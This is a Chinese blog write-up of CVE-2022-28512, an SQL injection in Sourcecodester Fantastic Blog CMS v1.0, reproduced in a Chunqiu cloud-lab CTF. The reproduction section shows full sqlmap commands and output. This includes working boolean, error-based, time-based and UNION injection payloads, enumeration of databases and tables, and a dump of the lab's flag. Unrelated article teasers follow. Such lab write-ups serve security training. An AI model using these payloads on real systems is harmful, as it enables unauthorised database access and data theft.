Sourcecodester Fantastic Blog CMS v1.0 SQL 注入漏洞(CVE-2022-28512)

前言

CVE-2022-28512 是一个存在于 Sourcecodester Fantastic Blog CMS v1.0 中的 SQL 注入漏洞。攻击者可以通过 "/fantasticblog/single.php" 中的 id 参数注入恶意 SQL 查询,从而获得对数据库的未经授权的访问和控制。

漏洞详细信息

  • 漏洞描述: 该漏洞允许攻击者通过 "/fantasticblog/single.php"id 参数进行 SQL 注入。
  • 漏洞影响: 攻击者可以利用此漏洞获取敏感数据、修改数据库内容,甚至执行任意 SQL 命令,导致整个系统的安全性受到严重威胁。
  • CVSS评分:
    • CVSS v3.1: 9.8 (Critical)
    • CVSS v2.0: 7.5 (High)
  • CWE ID: CWE-89(SQL 注入)

受影响的软件

  • Sourcecodester Fantastic Blog CMS: v1.0

修复建议

强烈建议用户立即更新 Sourcecodester Fantastic Blog CMS 至最新版本,或者应用官方提供的补丁。同时,在应用程序开发中应实施严格的输入验证和参数化查询,以防止 SQL 注入漏洞。

春秋云镜靶场是一个专注于网络安全培训和实战演练的平台,旨在通过模拟真实的网络环境和攻击场景,提升用户的网络安全防护能力和实战技能。这个平台主要提供以下功能和特点:

实战演练:

提供各种网络安全攻防演练场景,模拟真实的网络攻击事件,帮助用户在实际操作中掌握网络安全技术。
场景涵盖Web安全、系统安全、网络安全、社工攻击等多个领域。
漏洞复现:

用户可以通过平台对已知的安全漏洞进行复现,了解漏洞的产生原因、利用方法和修复措施。
通过实战操作,帮助用户掌握漏洞利用和防护的技能。
教学培训:

提供系统化的网络安全课程,从基础到高级,覆盖多个安全领域,适合不同水平的用户。
包含理论讲解和实战操作,帮助学员全面提升网络安全知识和实战能力。
竞赛与评测:

定期举办网络安全竞赛,如CTF(Capture The Flag)比赛,激发学员的学习兴趣和动力。
提供个人和团队的安全能力评测,帮助学员了解自己的安全技能水平。
资源共享:

平台提供丰富的学习资源,包括教程、工具、案例分析等,方便用户随时查阅和学习。
用户可以在社区中分享经验和资源,互相交流和学习。

春秋云镜靶场适合网络安全从业人员、学生以及对网络安全感兴趣的个人,通过在平台上进行不断的学习和实战演练,可以有效提升网络安全技能和防护能力。

介绍

Sourcecodester Fantastic Blog CMS v1.0 是一个内容管理系统,用于创建和管理博客网站。该系统使用 PHP、MySQL、JavaScript 和 HTML/CSS 构建,旨在提供一个简单且用户友好的博客平台。它主要功能包括用户管理、文章管理和评论管理等。

功能特色

  1. 用户管理:管理员可以创建和管理用户账户,赋予不同的权限,如管理员和普通用户。
  2. 文章管理:用户可以创建、编辑和删除博客文章,包括设置文章的标题、内容和标签等。
  3. 评论管理:用户可以在文章下发表评论,管理员可以审核和管理这些评论,防止垃圾评论的出现。
  4. 多媒体管理:支持上传和管理图片、视频等多媒体文件,以丰富博客内容。
  5. 分类和标签:支持对文章进行分类和添加标签,方便内容的组织和检索。

安装和使用

  1. 服务器要求:需要一个支持 PHP 和 MySQL 的服务器环境,如 XAMPP 或 WAMP。
  2. 数据库配置:下载源码后,配置数据库连接信息,并导入初始数据库文件。
  3. 用户界面:通过简单的界面,用户可以方便地发布和管理博客内容,浏览者可以轻松地阅读和评论文章。

该系统适合个人博客和小型网站的搭建,提供了基础的博客功能,同时源码开放,用户可以根据需要进行二次开发和定制​ (SourceCodester)​​ (SourceCodester)​​ (SourceCodester)​。

漏洞复现

打开靶场

根据题目手动构造 URL

http://eci-2zehz8yh4xe8fzah182w.cloudeci1.ichunqiu.com/single.php?id=1

原首页可以看到是有登录的 

现在咱们能直接构造 URL 访问目标页面说明没有用户验证,直接上 SQLMap 跑它

┌──(root㉿kali)-[~]
└─# sqlmap -u "http://eci-2zehz8yh4xe8fzah182w.cloudeci1.ichunqiu.com/single.php?id=1" --batch --dbs_____H_____ ___["]_____ ___ ___  {1.8.4#stable}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 20:24:55 /2024-06-29/[20:24:55] [INFO] testing connection to the target URL
[20:24:55] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:24:55] [INFO] testing if the target URL content is stable
[20:24:56] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[20:24:56] [INFO] testing if GET parameter 'id' is dynamic
[20:24:56] [WARNING] GET parameter 'id' does not appear to be dynamic
[20:24:56] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[20:24:56] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[20:24:56] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[20:24:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:24:57] [WARNING] reflective value(s) found and filtering out
[20:24:57] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[20:24:57] [INFO] testing 'Generic inline queries'
[20:24:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[20:25:02] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[20:25:05] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[20:25:09] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:25:12] [INFO] GET parameter 'id' appears to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable 
[20:25:12] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[20:25:12] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[20:25:12] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[20:25:12] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[20:25:12] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[20:25:12] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[20:25:12] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[20:25:13] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[20:25:13] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:25:13] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable 
[20:25:13] [INFO] testing 'MySQL inline queries'
[20:25:13] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[20:25:13] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[20:25:13] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[20:25:13] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[20:25:13] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[20:25:13] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[20:25:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:25:23] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[20:25:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:25:23] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[20:25:23] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:25:23] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:25:24] [INFO] target URL appears to have 9 columns in query
[20:25:25] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 260 HTTP(s) requests:
---
Parameter: id (GET)Type: boolean-based blindTitle: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clausePayload: id=1' RLIKE (SELECT (CASE WHEN (1569=1569) THEN 1 ELSE 0x28 END))-- DGYWType: error-basedTitle: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)Payload: id=1' AND (SELECT 4914 FROM(SELECT COUNT(*),CONCAT(0x717a786271,(SELECT (ELT(4914=4914,1))),0x71717a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- QBlPType: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: id=1' AND (SELECT 7718 FROM (SELECT(SLEEP(5)))VCMl)-- mzYYType: UNION queryTitle: MySQL UNION query (NULL) - 9 columnsPayload: id=-1282' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a786271,0x4a6e55544a774f4a56556872484d58704a5a4c494d756e756774556e45757257586d564a70677252,0x71717a7171),NULL,NULL,NULL,NULL,NULL#
---
[20:25:25] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.20
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[20:25:25] [INFO] fetching database names
[20:25:26] [INFO] retrieved: 'information_schema'
[20:25:26] [INFO] retrieved: 'performance_schema'
[20:25:26] [INFO] retrieved: 'mysql'
[20:25:26] [INFO] retrieved: 'ctf'
available databases [4]:                                                       
[*] ctf
[*] information_schema
[*] mysql
[*] performance_schema[20:25:26] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zehz8yh4xe8fzah182w.cloudeci1.ichunqiu.com'[*] ending @ 20:25:26 /2024-06-29/┌──(root㉿kali)-[~]
└─# sqlmap -u "http://eci-2zehz8yh4xe8fzah182w.cloudeci1.ichunqiu.com/single.php?id=1" --batch -D "ctf" --tables_____H_____ ___[.]_____ ___ ___  {1.8.4#stable}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 20:26:21 /2024-06-29/[20:26:21] [INFO] resuming back-end DBMS 'mysql' 
[20:26:21] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)Type: boolean-based blindTitle: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clausePayload: id=1' RLIKE (SELECT (CASE WHEN (1569=1569) THEN 1 ELSE 0x28 END))-- DGYWType: error-basedTitle: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)Payload: id=1' AND (SELECT 4914 FROM(SELECT COUNT(*),CONCAT(0x717a786271,(SELECT (ELT(4914=4914,1))),0x71717a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- QBlPType: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: id=1' AND (SELECT 7718 FROM (SELECT(SLEEP(5)))VCMl)-- mzYYType: UNION queryTitle: MySQL UNION query (NULL) - 9 columnsPayload: id=-1282' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a786271,0x4a6e55544a774f4a56556872484d58704a5a4c494d756e756774556e45757257586d564a70677252,0x71717a7171),NULL,NULL,NULL,NULL,NULL#
---
[20:26:22] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.20
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[20:26:22] [INFO] fetching tables for database: 'ctf'
[20:26:22] [INFO] retrieved: 'titles'
[20:26:22] [INFO] retrieved: 'page_hits'
[20:26:22] [INFO] retrieved: 'membership_userpermissions'
[20:26:22] [INFO] retrieved: 'membership_groups'
[20:26:23] [INFO] retrieved: 'blog_categories'
[20:26:23] [INFO] retrieved: 'membership_userrecords'
[20:26:23] [INFO] retrieved: 'membership_users'
[20:26:23] [INFO] retrieved: 'editors_choice'
[20:26:23] [INFO] retrieved: 'blogs'
[20:26:23] [INFO] retrieved: 'links'
[20:26:23] [INFO] retrieved: 'flag'
[20:26:23] [INFO] retrieved: 'banner_posts'
[20:26:23] [INFO] retrieved: 'membership_grouppermissions'
[20:26:23] [INFO] retrieved: 'visitor_info'
Database: ctf                                                                                                                      
[14 tables]
+-----------------------------+
| banner_posts                |
| blog_categories             |
| blogs                       |
| editors_choice              |
| flag                        |
| links                       |
| membership_grouppermissions |
| membership_groups           |
| membership_userpermissions  |
| membership_userrecords      |
| membership_users            |
| page_hits                   |
| titles                      |
| visitor_info                |
+-----------------------------+[20:26:23] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zehz8yh4xe8fzah182w.cloudeci1.ichunqiu.com'[*] ending @ 20:26:23 /2024-06-29/┌──(root㉿kali)-[~]
└─# sqlmap -u "http://eci-2zehz8yh4xe8fzah182w.cloudeci1.ichunqiu.com/single.php?id=1" --batch -D "ctf" -T "flag" --columns_____H_____ ___[(]_____ ___ ___  {1.8.4#stable}
|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 20:26:39 /2024-06-29/[20:26:39] [INFO] resuming back-end DBMS 'mysql' 
[20:26:40] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)Type: boolean-based blindTitle: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clausePayload: id=1' RLIKE (SELECT (CASE WHEN (1569=1569) THEN 1 ELSE 0x28 END))-- DGYWType: error-basedTitle: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)Payload: id=1' AND (SELECT 4914 FROM(SELECT COUNT(*),CONCAT(0x717a786271,(SELECT (ELT(4914=4914,1))),0x71717a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- QBlPType: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: id=1' AND (SELECT 7718 FROM (SELECT(SLEEP(5)))VCMl)-- mzYYType: UNION queryTitle: MySQL UNION query (NULL) - 9 columnsPayload: id=-1282' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a786271,0x4a6e55544a774f4a56556872484d58704a5a4c494d756e756774556e45757257586d564a70677252,0x71717a7171),NULL,NULL,NULL,NULL,NULL#
---
[20:26:40] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.20
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[20:26:40] [INFO] fetching columns for table 'flag' in database 'ctf'
Database: ctf
Table: flag
[1 column]
+--------+---------------+
| Column | Type          |
+--------+---------------+
| flag   | varchar(1024) |
+--------+---------------+[20:26:40] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zehz8yh4xe8fzah182w.cloudeci1.ichunqiu.com'[*] ending @ 20:26:40 /2024-06-29/┌──(root㉿kali)-[~]
└─# sqlmap -u "http://eci-2zehz8yh4xe8fzah182w.cloudeci1.ichunqiu.com/single.php?id=1" --batch -D "ctf" -T "flag" -C "flag" --dump_____H_____ ___[,]_____ ___ ___  {1.8.4#stable}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 20:27:13 /2024-06-29/[20:27:13] [INFO] resuming back-end DBMS 'mysql' 
[20:27:13] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)Type: boolean-based blindTitle: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clausePayload: id=1' RLIKE (SELECT (CASE WHEN (1569=1569) THEN 1 ELSE 0x28 END))-- DGYWType: error-basedTitle: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)Payload: id=1' AND (SELECT 4914 FROM(SELECT COUNT(*),CONCAT(0x717a786271,(SELECT (ELT(4914=4914,1))),0x71717a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- QBlPType: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: id=1' AND (SELECT 7718 FROM (SELECT(SLEEP(5)))VCMl)-- mzYYType: UNION queryTitle: MySQL UNION query (NULL) - 9 columnsPayload: id=-1282' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a786271,0x4a6e55544a774f4a56556872484d58704a5a4c494d756e756774556e45757257586d564a70677252,0x71717a7171),NULL,NULL,NULL,NULL,NULL#
---
[20:27:13] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.20
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[20:27:13] [INFO] fetching entries of column(s) 'flag' for table 'flag' in database 'ctf'
Database: ctf
Table: flag
[1 entry]
+--------------------------------------------+
| flag                                       |
+--------------------------------------------+
| flag{ab5bd2f1-096b-4ed8-928a-59056341e86b} |
+--------------------------------------------+[20:27:14] [INFO] table 'ctf.flag' dumped to CSV file '/root/.local/share/sqlmap/output/eci-2zehz8yh4xe8fzah182w.cloudeci1.ichunqiu.com/dump/ctf/flag.csv'
[20:27:14] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zehz8yh4xe8fzah182w.cloudeci1.ichunqiu.com'[*] ending @ 20:27:14 /2024-06-29/

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/pingmian/40805.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

工具发送formdata请求 Multipartfile 接收

1.需求&#xff1a; 接收到 (Multipartfile file 文件 》使用工具转发到别的请求&#xff0c;将文件传到别的接口 主要代码&#xff1a; InputStreamResource inputstreamResource new InputstreamResource(file.getInputstream(), file.getoriginalfilename());MultiReso…

全网都在疯传的最新蓝海风口项目!

最近全网都在疯传这种视频&#xff0c;想必兄弟们都见到过了&#xff01; 大家看这个号&#xff0c;1天的时间&#xff0c;2个作品&#xff0c;第2个直接就爆了&#xff0c;昨天看点赞还是3.8w&#xff0c;今天已经10w了&#xff0c;这是妥妥的风口啊&#xff01; 大家有没有想…

应用在灯带Type-C接口上的PD SINK协议芯片ECP5701/ECP5702获取充电器的5V、9V、12V、15V、20V供电

方案背景 近日&#xff0c;欧盟就统一充电器接口的提案达成了一项政治协议&#xff0c;其中规定了在欧盟地区销售的所有手机或其他便携式中小型电子设备必须采用统一的USB Type-C接口。这项决定意味着未来将会有更多的产品强制性地使用TYPE-C充电接口。 在这个背景下&#xf…

wordpress 付费主题modown分享,可实现资源付费

该主题下载地址 下载地址 简介 Modown是基于Erphpdown 会员下载插件开发的付费下载资源、付费下载源码、收费附件下载、付费阅读查看隐藏内容、团购下载的WordPress主题&#xff0c;一款针对收费付费下载资源/付费查看内容/付费阅读/付费视频/VIP会员免费下载查看/虚拟资源售…

在Linux上查找文件的2个好用的命令

1. locate xx &#xff08;查找带xx字符的所有文件或目录&#xff09; 在终端输入命令 locate lua&#xff0c;可以看到&#xff0c;所有带lua字符的文件或目录都会被搜索出来。 2. find / -name xx &#xff08;查找名为xx的文件或目录&#xff09; 在终端输入命令 find …

SpringBoot集成beetl模板快速入门

在pom文件引入maven依赖 <dependency><groupId>com.ibeetl</groupId><artifactId>beetl-framework-starter</artifactId><version>1.1.81.RELEASE</version></dependency>写一个controller /*** author * create * descripti…

SecureCRT--使用sftp上传和下载文件

原文网址&#xff1a;SecureCRT--使用sftp上传和下载文件_IT利刃出鞘的博客-CSDN博客 简介 本文介绍SecureCRT如何在软件内直接上传和下载文件。 SecureCRT可以用如下两种方法上传和下载文件&#xff1a; 自带的sftp插件服务器安装rz/sz命令 本文介绍第一种方法&#xff0…

【Android面试八股文】Android性能优化面试题:怎样检测函数执行是否卡顿?

文章目录 卡顿一、可重现的卡顿二、不可重现的卡顿第一种方案: 基于 Looper 的监控方法第二种方案:基于 Choreographer 的监控方法第三种方案:字节码插桩方式第四种方案: 使用 JVMTI 监听函数进入与退出总结相关大厂的方案ArgusAPMBlockCanaryQQ空间卡慢组件Matrix微信广研参…

vue目录说明

vue目录说明 主要目录说明 .vscode - - -vscode工具的配置文件夹 node_modules - - - vue项目的运行依赖文件夹 public - - -资源文件夹&#xff08;浏览器图标&#xff09; src- - -源码文件夹 .gitignore - - -git忽略文件 index.html - - -入口html文件 package.json - - -…

系统架构设计师教程(清华第2版)<第1章 绪论>解读

系统架构设计师教程 第一章 绪论 1.1 系统架构概述1.1.1 系统架构的定义及发展历程1.1.2 软件架构的常用分类及建模方法1.1.3 软件架构的应用场景1.1.4 软件架构的发展未来1.2 系统架构设计师概述1.2.1 架构设计师的定义、职责和任务1.2.2 架构设计师应具备的专业素质1.3 如何成…

上份工作不干了24年5月-6月回顾(面试+软考)需要资料的小伙伴可以关注下

前言&#xff1a; 博主在5月和6月基本没有对博客内容进行更新了&#xff0c;不是博主偷懒&#xff0c;5月份博主在全力准备24年系统分析师的软考&#xff0c;6月份在准备面试&#xff0c;现在对5月和6月进行回顾&#xff1b; 先说下软考系统分析师&#xff1a; 博主实在今年3月…

记录OSPF配置,建立邻居失败的过程

1.配置完ospf后&#xff0c;在路由表中不出现ospf相关信息 [SW2]ospf [SW2-ospf-1]are [SW2-ospf-1]area 0 [SW2-ospf-1-area-0.0.0.0]net [SW2-ospf-1-area-0.0.0.0]network 0.0.0.0 Jul 4 2024 22:11:58-08:00 SW2 DS/4/DATASYNC_CFGCHANGE:OID 1.3.6.1.4.1.2011.5.25 .1…

arm_uart4实验

#include "uart4.h" //UART //初始化 void hal_uart4_init() { //rcc_init //…

前端Debugger时复制的JS对象字符转JSON对象

前端debugger时&#xff0c;复制的对象在控制台输出时是如下格式&#xff0c;需要转换为对象格式来进行验证操作 bridgeId : 4118 createBy : null createTime : "2023-03-24 10:35:26" createUserId : 1 具体实现代码&#xff1a; // 转换transform (text) {l…

openlayers中区域掩膜的实现

概述 在前文完成了mapboxGL中区域掩膜的实现。近日有人问到说在openlayers中如何实现&#xff0c;本文就带大家看看如何在openlayers中实现区域掩膜。 实现效果 实现 1. 实现思路 在地图容器中添加一个canvas&#xff0c;设置其在map之上&#xff1b;监听map的postrender事…

文华财经T9多空波段趋势量化交易策略模型源码

// 定义变量 Vars Numeric STEP1,MVALUE1,SARVAL,C; Numeric SARLINE,COND,ZBMA1,ZBMA2; Begin CCLOSE; STEP13/11; MVALUE120/22; SARVALSAR(4, STEP1, MVALUE1); PlotLine("",IIF(SARVAL>0,SARVAL,InvalidNumeric),RED,Circledot); PlotLine("&q…

AI大模型开发入门:OpenAI API的Hello World

AI大模型时代下&#xff0c;我们也要学点大模型知识了。 前面我们简单实现了将GPT接入微信公众号&#xff1a; [【超详细&#xff01;】Python微信公众号开发&#xff08;4&#xff09;- 手把手教你接入GPT]&#xff0c;算是已经用过一点AI的知识了&#xff0c;浅尝辄止。 这还…

[吃瓜教程]南瓜书第5章神经网络

1.M-P神经元 M-P神经元&#xff0c;全称为McCulloch-Pitts神经元&#xff0c;是一种数学模型&#xff0c;用于模拟生物神经元的功能。这个模型是由Warren McCulloch和Walter Pitts在1943年提出的。它是人工智能和计算神经科学领域中非常重要的早期模型。 M-P神经元接收n个输入…

[数据集][目标检测]轮椅检测数据集VOC+YOLO格式13826张1类别

数据集格式&#xff1a;Pascal VOC格式YOLO格式(不包含分割路径的txt文件&#xff0c;仅仅包含jpg图片以及对应的VOC格式xml文件和yolo格式txt文件) 图片数量(jpg文件个数)&#xff1a;13826 标注数量(xml文件个数)&#xff1a;13826 标注数量(txt文件个数)&#xff1a;13826 标…

Python学习笔记28:进阶篇(十七)常见标准库使用之质量控制中的代码质量与风格第二部分

前言 本文是根据python官方教程中标准库模块的介绍&#xff0c;自己查询资料并整理&#xff0c;编写代码示例做出的学习笔记。 根据模块知识&#xff0c;一次讲解单个或者多个模块的内容。 教程链接&#xff1a;https://docs.python.org/zh-cn/3/tutorial/index.html 质量控制…